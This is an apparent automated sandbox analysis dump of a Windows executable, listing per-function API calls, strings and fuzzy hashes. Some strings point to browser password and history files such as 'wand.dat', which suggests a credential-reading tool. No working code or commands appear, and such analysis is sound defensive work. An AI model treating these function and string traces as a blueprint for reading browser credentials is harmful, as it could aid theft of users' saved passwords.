                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                • memset.MSVCRT ref: 004450CD
                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                • String ID:
                                • API String ID: 1471605966-0
                                • Opcode ID: ca7eb0cd5b8fbbdf152ee798ff9388e5abd8a9aa9fa9ab44d67de31ac5094677
                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                • Opcode Fuzzy Hash: ca7eb0cd5b8fbbdf152ee798ff9388e5abd8a9aa9fa9ab44d67de31ac5094677
                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044474A, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                Download Yara Rule
                                APIs
                                • wcscpy.MSVCRT ref: 0044475F
                                • wcscat.MSVCRT ref: 0044476E
                                • wcscat.MSVCRT ref: 0044477F
                                • wcscat.MSVCRT ref: 0044478E
                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                • String ID: \StringFileInfo\
                                • API String ID: 102104167-2245444037
                                • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E8E0, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F508, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$??3@
                                • String ID: g4@
                                • API String ID: 3314356048-2133833424
                                • Opcode ID: df896e81b30d52cbef9a852e08d92ce3e452075eb819ffe599cff81d050e1bbe
                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                • Opcode Fuzzy Hash: df896e81b30d52cbef9a852e08d92ce3e452075eb819ffe599cff81d050e1bbe
                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00401942, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                Download Yara Rule
                                APIs
                                • GetSystemMetrics.USER32(00000000), ref: 00401990
                                • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: MetricsSystem$PlacementWindow
                                • String ID: AE
                                • API String ID: 3548547718-685266089
                                • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040AAE3, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _memicmpwcslen
                                • String ID: @@@@$History
                                • API String ID: 1872909662-685208920
                                • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004100D7, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 004100FB
                                • memset.MSVCRT ref: 00410112
                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                • _snwprintf.MSVCRT ref: 00410141
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                • String ID: </%s>
                                • API String ID: 3400436232-259020660
                                • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E758, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040E770
                                • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: MessageSendmemset
                                • String ID: AE$"
                                • API String ID: 568519121-1989281832
                                • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D553, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040D58D
                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ChildEnumTextWindowWindowsmemset
                                • String ID: caption
                                • API String ID: 1523050162-4135340389
                                • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00401137, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                • String ID: MS Sans Serif
                                • API String ID: 210187428-168460110
                                • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409D7F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ClassName_wcsicmpmemset
                                • String ID: edit
                                • API String ID: 2747424523-2167791130
                                • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414E13, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                • String ID: SHAutoComplete$shlwapi.dll
                                • API String ID: 3150196962-1506664499
                                • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041D893, Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$memcmp
                                • String ID:
                                • API String ID: 3384217055-0
                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412A2A, Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$memcpy
                                • String ID:
                                • API String ID: 368790112-0
                                • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410D9B, Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                • GetMenu.USER32(?), ref: 00410F8D
                                • GetSubMenu.USER32(00000000), ref: 00410F9A
                                • GetSubMenu.USER32(00000000), ref: 00410F9D
                                • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                • String ID:
                                • API String ID: 1889144086-0
                                • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00417FD5, Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                • GetLastError.KERNEL32 ref: 0041810A
                                • CloseHandle.KERNEL32(00000000), ref: 00418120
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                • String ID:
                                • API String ID: 1661045500-0
                                • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0042EB92, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                • memcpy.MSVCRT ref: 0042EC7A
                                Strings
                                • sqlite_altertab_%s, xrefs: 0042EC4C
                                • virtual tables may not be altered, xrefs: 0042EBD2
                                • Cannot add a column to a view, xrefs: 0042EBE8
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpymemset
                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                • API String ID: 1297977491-2063813899
                                • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004055C5, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040560C
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                • String ID: *.*$dat$wand.dat
                                • API String ID: 2618321458-1828844352
                                • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410C46, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                • wcslen.MSVCRT ref: 00410C74
                                • _wtoi.MSVCRT ref: 00410C80
                                • _wcsicmp.MSVCRT ref: 00410CCE
                                • _wcsicmp.MSVCRT ref: 00410CDF
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                • String ID:
                                • API String ID: 1549203181-0
                                • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412018, Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00412057
                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                • GetKeyState.USER32(00000010), ref: 0041210D
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                • String ID:
                                • API String ID: 3550944819-0
                                • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A8D0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                • wcslen.MSVCRT ref: 0040A8E2
                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
